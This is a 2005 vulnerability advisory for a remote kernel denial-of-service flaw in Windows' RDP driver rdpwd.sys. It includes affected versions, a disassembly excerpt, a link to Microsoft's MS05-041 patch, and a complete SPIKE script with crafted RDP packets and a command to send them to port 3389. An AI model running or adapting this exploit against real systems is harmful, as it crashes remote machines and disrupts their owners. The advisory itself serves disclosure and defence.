Microsoft Windows RDP 'rdpwd.sys' Remote Kernel DoS

Release Date:
August 9, 2005

Date Reported:
May 4, 2005

Severity:
Medium

Vendor:
Microsoft

Systems Affected:
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition

Overview:
A denial of service vulnerability exists within the Remote Desktop Services which allows for an attacker to send a specially
crafted RDP packet in order to crash the remote vulnerable system.

This flaw specifically exists within the rdpwd.sys driver file which is used by the Remote Desktop Services.

Technical Details:
It appears that the problem exists because RDP does not release the memory it is using. The kernel can only use a certain
amount of physical memory. So when RDP goes over its memory limit, it causes the crash.

After analyzing the dump file, you can see that RDP will try and copy 7 bytes of the error point. If it follows this error
point of whatever package it’s looking for does not have 7 bytes, the problem occurs. So what it does then is it copies the
following data randomly into memory:

This is taken from Windows XP SP2 rdpwd.sys verison 5.1.2600.2180.

.text:00010579 mov ecx, [ebx+28h]
.text:0001057C cmp edi, ecx
.text:0001057E jbe loc_1049E ;<(-- find the error, then go to error process

.text:0001049E push 7 ;<(-- push fix y
.text:000104A0 push esi ;<(-- the find error point
.text:000104A1 push 0Bh
.text:000104A3 jmp loc_107C8

.text:000107C8 push dword ptr [ebx+2Ch]
.text:000107CB push dword ptr [ebx]
.text:000107CD call _MCSProtocolErrorEvent@20 ;<(-- call error process

.text:0002BC60 mov eax, [ebp+arg_14] ;<(-- the size is 7
.text:0002BC63
.text:0002BC63 loc_2BC63: ; CODE XREF: MCSProtocolErrorEvent +9E^Xj
.text:0002BC63 test esi, esi
.text:0002BC65 jz short loc_2BC7F
.text:0002BC67 push edi
.text:0002BC68 mov ecx, eax
.text:0002BC6A mov edx, ecx
.text:0002BC6C shr ecx, 2
.text:0002BC6F lea edi, [ebp+var_100]
.text:0002BC75 rep movsd


Below is the remoteass.spk SPIKE script which reproduces this issue on Windows XP SP2:

// Windows XP SP2 'rdpwd.sys' Remote Kernel DoS
//
// Discovered by:
// Tom Ferris
// tommy[at]security-protocols[dot]com
//
// Tested on:
// Microsoft Windows XP SP2
//
// Usage: ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0
//
// 8/9/2005 Security-Protocols.com
//
// This program is free software; you can redistribute it and/or modify it under
// the terms of the GNU General Public License version 2, 1991 as published by
// the Free Software Foundation.

s_block_start("packet_1");
s_string_variable("03");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D 73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D
0A");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A");
s_string_variable("");
s_binary("41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41");
s_string_variable("");
s_block_end("packet_1");

s_block_start("packet_2");
s_int_variable(0x0500,5);
s_block_end("packet_2");

s_block_start("packet_3");
s_binary("000002020000");
s_string_variable("");
s_block_end("packet_3");

This is how the script should be ran:

./generic_send_tcp 192.168.1.102 3389 remoteass.spk 1 0

Vendor Status:
Microsoft has released a patch for this issue:

MS05-041

Discovered by:
Tom Ferris

Related Links:
www.security-protocols.com/released/xp-sp2-rdp-dos.rar
www.microsoft.com/technet/security/advisory/904797.mspx
www.microsoft.com/technet/security/Bulletin/MS05-041.mspx

Greetings:
c0nnie, chicofleeco, ac1djazz, costa rica mike, modify, the angrypacket krew and michael.

Copyright (c) 2005 Security-Protocols.com